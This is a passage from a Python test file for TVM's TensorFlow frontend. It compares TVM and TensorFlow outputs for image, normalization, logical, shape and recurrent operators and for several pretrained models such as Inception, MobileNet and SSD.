compare_tf_with_tvm(data, "Placeholder:0", "out1:0")
def _test_fill_symbolic_inputs(in_shape_data, in_value_data, dtype):
with tf.Graph().as_default():
in_shape = tf.placeholder(shape=[in_shape_data.shape[0]], dtype=in_shape_data.dtype)
in_value = tf.placeholder(shape=(), dtype=dtype)
out = tf.fill(in_shape, in_value)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[in_shape_data, in_value_data], [in_shape.name, in_value.name], out.name, mode=mode
)
def test_forward_fill():
""" Resize Bilinear """
_test_fill((32))
_test_fill((6, 32, 64, 64))
_test_fill_from_tensor((6, 32, 64, 64))
_test_fill_symbolic_inputs(np.array((2,)), np.int32(9), tf.int32)
_test_fill_symbolic_inputs(np.array((2, 3)), 9, tf.int64)
_test_fill_symbolic_inputs(np.array((2, 3, 4)), np.float32(9.0), tf.float32)
#######################################################################
# Crop to bounding box
# --------------------
def _test_crop(in_shape, off_h, off_w, tar_h, tar_w):
""" Crop to bounding box """
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
tf.image.crop_to_bounding_box(in_data, off_h, off_w, tar_h, tar_w)
compare_tf_with_tvm(data, "Placeholder:0", "crop_to_bounding_box/Slice:0")
def test_forward_crop():
""" Crop to bounding box """
_test_crop((1, 224, 224, 3), 20, 20, 120, 120)
#######################################################################
# CropAndResize
# -------------
def _test_forward_crop_and_resize(
img_shape,
boxes,
box_idx,
crop_size,
extrapolation_value=0.0,
method="bilinear",
dtype="float32",
):
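    """ One iteration of CropAndResize """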
image = np.random.uniform(0, 10, size=img_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = array_ops.placeholder(dtype, image.shape, name="in_data")
tf.image.crop_and_resize(
in_data,
boxes=boxes,
box_ind=box_idx,
crop_size=crop_size,
method=method,
extrapolation_value=extrapolation_value,
name="crop_and_resize",
)
compare_tf_with_tvm([image], ["in_data:0"], "crop_and_resize:0")
def test_forward_crop_and_resize():
""" CropAndResize """
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3])
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2)
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2, "nearest")
_test_forward_crop_and_resize([1, 11, 11, 3], [[0.3, 0.3, 1, 1]], [0], [21, 21])
_test_forward_crop_and_resize([1, 41, 41, 3], [[0.2, 0.4, 0.8, 0.8]], [0], [21, 11])
_test_forward_crop_and_resize([1, 100, 100, 3], [[0, 0, 0.9, 0.9]], [0], [30, 30])
_test_forward_crop_and_resize([1, 224, 224, 3], [[0.1, 0.2, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 249, 249, 3], [[0, 0, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 201, 301, 3], [[0.2, 0.3, 0.7, 0.8]], [0], [51, 51])
_test_forward_crop_and_resize(
img_shape=[10, 11, 11, 3],
boxes=[[0, 0, 0.9, 0.9], [0.2, 0.2, 0.8, 0.8]],
box_idx=[0, 1],
crop_size=[5, 5],
)
_test_forward_crop_and_resize(
img_shape=[20, 576, 576, 3],
boxes=[[0, 0, 1, 1], [0, 0, 0.8, 0.8], [0.1, 0.2, 0.9, 1], [0.2, 0, 1, 1]],
box_idx=[1, 0, 2, 3],
crop_size=[24, 24],
extrapolation_value=0.3,
)
_test_forward_crop_and_resize(
img_shape=[20, 229, 229, 3],
boxes=[[0, 0, 0.9, 0.9], [0.3, 0.3, 1, 1], [0.2, 0.1, 0.7, 0.8], [0, 0, 1, 1]],
box_idx=[3, 0, 2, 1],
crop_size=[58, 58],
extrapolation_value=0.2,
method="nearest",
)
#######################################################################
# Non Max Suppression
# -------------------
def _test_forward_nms_v3(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
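    """ One iteration of NonMaxSuppressionV3 """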
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="debug",
)
def _test_forward_nms_v4(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
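    """ One iteration of NonMaxSuppressionV4 """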
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
indices_padded, num_valid = tf.image.non_max_suppression_padded(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
pad_to_max_output_size=True,
)
num_valid = tf.reshape(num_valid, shape=(-1,))
indices_padded = tf.reshape(indices_padded, shape=(-1,))
tf.slice(indices_padded, tf.constant([0]), num_valid, name="SlicedIndices")
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="debug",
)
def _test_forward_nms_v5(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
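    """ One iteration of NonMaxSuppressionV5 """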
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression_with_scores(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV5:0", "nms/NonMaxSuppressionV5:1"],
mode="vm",
)
def test_forward_nms():
""" NonMaxSuppressionV3,5 """
for _test_forward_nms in [_test_forward_nms_v3, _test_forward_nms_v5]:
_test_forward_nms((5, 4), (5,), 0.7, 0.5, 5)
_test_forward_nms((20, 4), (20,), 0.5, 0.6, 10)
_test_forward_nms((1000, 4), (1000,), 0.3, 0.7, 1000)
_test_forward_nms((2000, 4), (2000,), 0.4, 0.6, 7)
def _test_forward_combined_nms(
bx_shape,
score_shape,
iou_threshold,
score_threshold,
out_size,
total_size,
clip_boxes=False,
dtype="float32",
):
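    """ One iteration of CombinedNonMaxSuppression """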
boxes = np.random.uniform(-1, 2, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.combined_non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size_per_class=in_data_3,
max_total_size=total_size,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
pad_per_class=False,
clip_boxes=clip_boxes,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
[
"nms/CombinedNonMaxSuppression:0",
"nms/CombinedNonMaxSuppression:1",
"nms/CombinedNonMaxSuppression:2",
"nms/CombinedNonMaxSuppression:3",
],
mode="vm",
)
def test_forward_combined_nms():
""" CombinedNonMaxSuppression """
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 1), 0.7, 0.5, 64, 64)
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 20), 0.7, 0.5, 64, 10)
_test_forward_combined_nms((1, 64, 20, 4), (1, 64, 20), 0.7, 0.5, 64, 64, clip_boxes=True)
_test_forward_combined_nms((2, 200, 1, 4), (2, 200, 1), 0.4, 0.6, 100, 100)
#######################################################################
# LSTM
# ----
def _test_lstm_cell(batch_size, num_hidden, num_layers, forget_bias, dtype):
""" One iteration of a LSTM cell """
tf.reset_default_graph()
input_size = num_hidden
input_data = np.full((batch_size, input_size), 1.0, dtype=dtype)
in_state_c = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
in_state_h = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
def _get_tensorflow_output():
with tf.Session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)
):
m0 = tf.placeholder(dtype, [batch_size, num_hidden], name="m0")
m1 = tf.placeholder(dtype, [batch_size, num_hidden], name="m1")
x = tf.placeholder(shape=(batch_size, input_size), dtype=dtype, name="input")
g, ((out_m0, out_m1)) = tensorflow.contrib.rnn.LSTMBlockCell(
num_hidden, forget_bias=forget_bias
)(x, (m0, m1))
sess.run([variables.global_variables_initializer()])
res = sess.run(
[g, out_m0, out_m1],
{
x.name: np.array([[1.0, 1.0]]),
m0.name: in_state_c,
m1.name: in_state_h,
},
)
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(
sess, graph_def, ["root/lstm_cell/LSTMBlockCell"]
)
return final_graph_def, res
graph_def, tf_out = _get_tensorflow_output()
tvm_output = run_tvm_graph(
graph_def,
[input_data, in_state_c, in_state_h],
["root/input", "root/m0", "root/m1"],
num_output=7,
)
assert isinstance(tvm_output, list)
tvm.testing.assert_allclose(tf_out[0], tvm_output[6], rtol=1e-3, atol=1e-3)
tvm.testing.assert_allclose(tf_out[1], tvm_output[1], rtol=1e-3, atol=1e-3)
def test_forward_lstm():
"""test LSTM block cell"""
if package_version.parse(tf.VERSION) < package_version.parse("2.0.0"):
# in 2.0, tf.contrib.rnn.LSTMBlockCell is removed
_test_lstm_cell(1, 2, 1, 0.5, "float32")
#######################################################################
# Pack
# ---
def _test_pack(axis, shape, **kwargs):
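    """One iteration of tf.stack (Pack) with the given axis and input shape."""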
a = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
b = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
with tf.Graph().as_default():
tf_a = array_ops.placeholder(shape=shape, dtype="float32", name="pl_a")
tf_b = array_ops.placeholder(shape=shape, dtype="float32", name="pl_b")
tf_c = tf.stack([tf_a, tf_b], axis=axis, **kwargs)
assert tf_c.op.op_def.name == "Pack", "tf.stack() is expected to produce 'Pack' operation"
compare_tf_with_tvm([a, b], ["pl_a:0", "pl_b:0"], "stack:0")
def test_forward_pack():
for axis in range(-3, 3):
_test_pack(axis, [3, 2, 1])
for axis in range(-1, 1):
_test_pack(axis, [3])
_test_pack(0, [])
#######################################################################
# Unpack
# ------
def _test_forward_unpack(in_shape, axis, dtype):
"""test operator Unpack"""
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.unstack(in_data, axis=axis, name="Unpack")
compare_tf_with_tvm([np_data], ["in_data:0"], "Unpack:0")
def test_forward_unpack():
_test_forward_unpack((3,), 0, "int32")
_test_forward_unpack((3,), -1, "int16")
_test_forward_unpack((21, 23, 3), 2, "float32")
#######################################################################
# Range
# -----
def test_forward_range():
"""test operator Range"""
for dtype in [tf.int32, tf.int64]:
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 18, 3, name="range", dtype=dtype)
compare_tf_with_tvm([], [], "range:0")
"""test type assignment for operator Range"""
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 256 + 1, 1, dtype=tf.float32)
compare_tf_with_tvm([], [], "range:0")
#######################################################################
# Pad
# ---
def _test_pad(input_shape, paddings, mode, **kwargs):
""" One iteration of pad operation with given shape"""
x = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
pad_values = constant_op.constant(paddings)
pad = tf.pad(in_data, paddings=pad_values, mode=mode, **kwargs)
if mode == "CONSTANT":
if "constant_values" in kwargs:
out_name = "PadV2:0"
else:
out_name = "Pad:0"
else:
out_name = "MirrorPad:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def test_forward_pad():
""" Pad """
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT", constant_values=1.0)
_test_pad((2, 3), [[1, 1], [2, 2]], mode="SYMMETRIC")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="REFLECT")
#######################################################################
# Logical operators
# --------------------
def test_logical_and():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_and(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_or():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_or(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_xor():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_xor(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_not():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
out = tf.logical_not(in1, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm(in_data1, "in1:0", "out:0")
def test_forward_logical():
test_logical_and()
test_logical_or()
test_logical_xor()
test_logical_not()
#######################################################################
# Where, Select, SelectV2
# -------------
def test_forward_where():
""" Where: return elements depending on conditions"""
with tf.Graph().as_default():
with tf.Session() as sess:
input1 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input1")
input2 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input2")
mask = input1 > input2
tf.where(mask, input1 + 1, input2 * 2)
in_data1 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
in_data2 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
compare_tf_with_tvm([in_data1, in_data2], ["input1:0", "input2:0"], "Select:0")
#######################################################################
# Inception V3
# ------------
def test_forward_inception_v3():
"""test inception V3 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"InceptionV3/inception_v3_2016_08_28_frozen-with_shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 299, 299, 3)).astype("float32")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input:0", "InceptionV3/Predictions/Reshape_1:0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Inception V1
# ------------
def test_forward_inception_v1():
"""test inception V1 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("InceptionV1/classify_image_graph_def-with_shapes.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
# Build an image from random data.
from PIL import Image
from tvm.contrib import utils
img_array = np.random.uniform(size=(1, 600, 600, 3)).astype("uint8")
        img = Image.frombuffer("RGB", (600, 600), img_array.tobytes(), "raw", "RGB", 0, 1)
temp = utils.tempdir()
img_path = temp.relpath("tf-test.jpg")
img.save(img_path)
import os.path
if not tf.gfile.Exists(os.path.join(img_path)):
tf.logging.fatal("File does not exist %s", img_path)
data = tf.gfile.FastGFile(os.path.join(img_path), "rb").read()
temp.remove()
# Extract tensorflow decoded image frame for tvm input
with tf.Session() as sess:
tvm_data = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "DecodeJpeg:0")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "softmax:0")
tvm_output = run_tvm_graph(graph_def, tvm_data, "DecodeJpeg/contents")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Mobilenet
# ---------
def test_forward_mobilenet():
"""test mobilenet model"""
# MobilenetV2
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"https://storage.googleapis.com/mobilenet_v2/checkpoints/mobilenet_v2_1.4_224.tgz",
"mobilenet_v2_1.4_224_frozen.pb",
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "MobilenetV2/Predictions/Reshape_1"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "input:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# ResnetV2
# --------
@tvm.testing.requires_gpu
def test_forward_resnetv2():
"""test resnet model"""
if is_gpu_available():
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"ResnetV2/resnet-20180601_resnet_v2_imagenet-shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(128, 224, 224, 3)).astype("float32")
out_node = "ArgMax"
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input_tensor:0", out_node + ":0")
for device in ["llvm", "cuda"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def, data, "input_tensor", len(tf_output), target=device
)
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# SSD
# ---
def _test_ssd_impl():
"""Test SSD with backbone MobileNet V1"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"object_detection/ssd_mobilenet_v1_ppn_shared_"
"box_predictor_300x300_coco14_sync_2018_07_03.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(0.0, 255.0, size=(1, 512, 512, 3)).astype("uint8")
in_node = "image_tensor"
out_node = ["detection_boxes", "detection_scores", "detection_classes"]
with tf.Session() as sess:
tf_output = run_tf_graph(
sess, data, "{}:0".format(in_node), ["{}:0".format(oname) for oname in out_node]
)
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
data,
in_node,
len(out_node),
target=device,
layout="NCHW",
out_names=out_node,
mode="vm",
disabled_pass=["FoldScaleAxis"],
serialize=True,
)
for i in range(len(out_node)):
tvm.testing.assert_allclose(tvm_output[i], tf_output[i], rtol=1e-3, atol=1e-3)
def test_forward_ssd():
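    # Run the test in a worker thread with an enlarged (100 * 1024 * 1024 byte) stack;
    # converting this SSD model recurses deeply and can overflow the default thread stack.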
run_thread = threading.Thread(target=_test_ssd_impl, args=())
old_stack_size = threading.stack_size(100 * 1024 * 1024)
run_thread.start()
run_thread.join()
threading.stack_size(old_stack_size)
#######################################################################
# Placeholder
# -----------
def test_forward_placeholder():
"""test a simple pb with Placeholder node in the end of GraphDef"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("Custom/placeholder.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "mul"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "Placeholder:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "Placeholder")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# PTB
# ---
try:
# Load contrib for running ptb model in tf version before 2.0
import tensorflow.contrib
except:
pass
def test_forward_ptb():
"""test ptb model"""
config = tf_testing.get_config()
num_steps = config.num_steps
num_hidden = config.hidden_size
num_layers = config.num_layers
batch_size = config.batch_size
vocab_size = config.vocab_size
out_sample_shape = (batch_size, vocab_size)
out_state_shape = (batch_size, num_hidden)
# Sample input
inpt = "we have no useful information on"
cnt_sample = 20
def _pretty_print(items, is_char_model, id2word):
if not is_char_model:
return " ".join([id2word[x] for x in items])
else:
return "".join([id2word[x] for x in items]).replace("_", " ")
def _get_tvm_graph_module(graph_def):
        # Cell inputs 'c' and 'h' consist of the values for all layers
shape_dict = {"Model/Placeholder": (batch_size, num_steps)}
mod, params = relay.frontend.from_tensorflow(
graph_def,
shape=shape_dict,
outputs=[
"Model/Softmax:0",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:6",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:6",
],
)
target = "llvm"
with tvm.transform.PassContext(opt_level=0):
graph, lib, params = relay.build(mod, target, params=params)
from tvm.contrib import graph_executor
dev = tvm.cpu(0)
return params, graph_executor.create(graph, lib, dev)
def _do_tvm_sample(model, data, in_states, params, num_samples):
"""Sampled from the model"""
samples = []
state = in_states
sample = None
def _get_sample(data, state):
input_data = np.full((batch_size, num_steps), data, dtype="int32")
model.set_input("Model/Placeholder", tvm.nd.array(input_data.astype("int32")))
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros",
tvm.nd.array(state[0].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros_1",
tvm.nd.array(state[1].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros",
tvm.nd.array(state[2].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros_1",
tvm.nd.array(state[3].astype("float32")),
)
model.set_input(**params)
model.run()
tvm_output = model.get_output(0, tvm.nd.empty(out_sample_shape, "float32")).asnumpy()
state_output = []
for i in range(4):
state_output.append(
model.get_output(i + 1, tvm.nd.empty(out_state_shape, "float32")).asnumpy()
)
sample = tf_testing.pick_from_weight(tvm_output[0])
return sample, state_output
for x in data:
sample, state = _get_sample(x, state)
if sample is not None:
samples.append(sample)
else:
samples.append(0)
k = 1
while k < num_samples:
sample, state = _get_sample(samples[-1], state)
samples.append(sample)
k += 1
return samples, state
with tf.Graph().as_default():
word_to_id, id_to_word, graph_def = tf_testing.get_workload_ptb()
vocab_size = len(word_to_id)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
sess = tf.Session()
# TVM graph module creation
params, m = _get_tvm_graph_module(graph_def)
        # Create 10 predicted statements of 20 words each
cnt_stm = 0
while cnt_stm < 10:
cnt_stm += 1
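            # Zero-initialized (c, h) state for every LSTM layer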
in_state = [np.full((batch_size, num_hidden), 0, dtype="float32")] * 2 * num_layers
seed_for_sample = inpt.split()
tvm_samples, tvm_state = _do_tvm_sample(
m, [word_to_id[word] for word in seed_for_sample], in_state, params, cnt_sample
)
tvm_sample_str = _pretty_print(tvm_samples, False, id_to_word)
tf_samples, tf_state = tf_testing.do_tf_sample(
sess, [word_to_id[word] for word in seed_for_sample], in_state, cnt_sample
)
tf_sample_str = _pretty_print(tf_samples, False, id_to_word)
inpt = tvm_sample_str
tvm.testing.assert_allclose(tf_samples, tvm_samples, rtol=1e-5, atol=1e-5)
assert tvm_sample_str == tf_sample_str
#######################################################################
# LRN (Local Response Normalization)
# ----------------------------------
def _test_lrn(ishape, size, axis, bias, alpha, beta):
""" testing local response normalization """
    lrn_depth_radius = size // 2
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype, name="lrn0_data")
nn_ops.local_response_normalization(
in1, name="lrn", depth_radius=lrn_depth_radius, bias=bias, alpha=alpha, beta=beta
)
compare_tf_with_tvm(inp_array, "lrn0_data:0", "lrn:0")
def test_forward_lrn():
_test_lrn((1, 3, 20, 20), 3, 1, 1.0, 1.0, 0.5)
#######################################################################
# l2_normalize
# ------------
def _test_l2_normalize(ishape, eps, axis):
""" testing l2 normalize (uses max, sum, square, sqrt frontend operators)"""
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
nn.l2_normalize(in1, axis=axis, epsilon=eps, name=None, dim=None)
compare_tf_with_tvm(inp_array, "Placeholder:0", "l2_normalize:0")
def test_forward_l2_normalize():
_test_l2_normalize((1, 3, 20, 20), 0.001, (0,))
#######################################################################
# transpose
# ---------
def _test_forward_transpose(ishape, axes=None):
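    """One iteration of Transpose with an optional permutation."""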
data = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
if axes is None:
tf.transpose(in1)
else:
tf.transpose(in1, perm=axes)
compare_tf_with_tvm(data, "transpose_data:0", "transpose:0")
def _test_forward_transpose_axes_input(ishape, axes):
data = np.random.uniform(size=ishape).astype(np.float32)
axes_np = np.array(axes).astype(np.int32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
const1 = tf.constant(axes_np, dtype=tf.int32)
# make axes an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
axes = tf.reverse(const1, axis=[-1])
tf.transpose(in1, axes)
compare_tf_with_tvm([data], ["transpose_data:0"], "transpose:0")
def test_forward_transpose():
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4))
_test_forward_transpose((7, 8, 8, 10))
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4), (0, 1, 2))
_test_forward_transpose((2, 3, 4, 5), (3, 0, 1, 2))
    _test_forward_transpose_axes_input((2, 3, 4), (1, 2, 0))
    _test_forward_transpose_axes_input((2, 3, 4, 5), (3, 0, 1, 2))
def _test_forward_slice_operation_input(input_value, begin_value, size_value):
input_data = np.array(input_value, dtype=np.float32)
with tf.Graph().as_default():
input_tensor = tf.placeholder(shape=input_data.shape, dtype=input_data.dtype, name="input")
tf.slice(input_tensor, begin_value, size_value, name="slice_output")
compare_tf_with_tvm([input_data], ["input:0"], "slice_output:0")
def test_forward_slice():
_test_forward_slice_operation_input([1, 1], [0], [2])
_test_forward_slice_operation_input([0, 1, 2, 3], [3], [-1])
_test_forward_slice_operation_input(
[[0, 1, 2, 3], [4, 5, 6, 7]], begin_value=[0, 1], size_value=[-1, -1]
)
def test_forward_ceil():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.ceil(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Ceil:0")
def test_forward_floor():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.floor(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Floor:0")
def test_forward_relu():
ishape = (1, 3, 10, 10)
